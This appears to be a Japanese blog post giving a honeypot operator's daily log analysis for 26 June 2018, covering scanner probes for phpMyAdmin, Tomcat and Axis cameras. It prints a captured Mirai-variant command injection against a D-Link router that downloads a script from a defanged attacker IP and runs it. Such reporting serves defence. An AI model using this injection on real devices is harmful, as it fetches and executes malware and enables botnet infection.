WOWhoneypotの2018/6/26(火)（運用23日目）の簡易分析です。

本日の総アクセス件数は121件です。

67 [2018-06-26 "HEAD /
45 [2018-06-26 "GET /
1 [2018-06-26 "GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 [2018-06-26 "GET /phpMyAdmin/scripts/setup.php
1 [2018-06-26 "GET /phpmyadmin/scripts/setup.php
1 [2018-06-26 "GET /pma/scripts/setup.php
1 [2018-06-26 "GET /myadmin/scripts/setup.php
1 [2018-06-26 "GET /MyAdmin/scripts/setup.php
1 [2018-06-26 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-26 "GET /manager/html
1 [2018-06-26 "GET /axis-cgi/jpg/image.cgi

あまり多くありませんね。

以下は全てスキャンツールZmEuによるスキャンです。

1 [2018-06-26 "GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 [2018-06-26 "GET /phpMyAdmin/scripts/setup.php
1 [2018-06-26 "GET /phpmyadmin/scripts/setup.php
1 [2018-06-26 "GET /pma/scripts/setup.php
1 [2018-06-26 "GET /myadmin/scripts/setup.php
1 [2018-06-26 "GET /MyAdmin/scripts/setup.php

その他のうち、以下は既知です。

GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$　…　ルータD-Linkの脆弱性を攻撃するMirai亜種
GET /manager/html　…　Tomcatの管理画面の調査行為

新たなログは以下です。

GET /axis-cgi/jpg/image.cgi HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51
Accept: */*
Referer: 1

このパスに対する脆弱性を調べたところ、Axis Communications社のネットワークカメラを狙った調査行為のようです。
とあるサイト曰く、以下のコメントがありました。

ハッカーは、他の人のポルノ写真を見るためにカメラに侵入するのが好きです。最も一般的なのは、AXISカメラをハイジャックすることです。

本日のハンティングログは以下です。Mirai亜種のみです。

1 [2018-06-26 wget hxxp://185.62.190[.]191/r

以上です。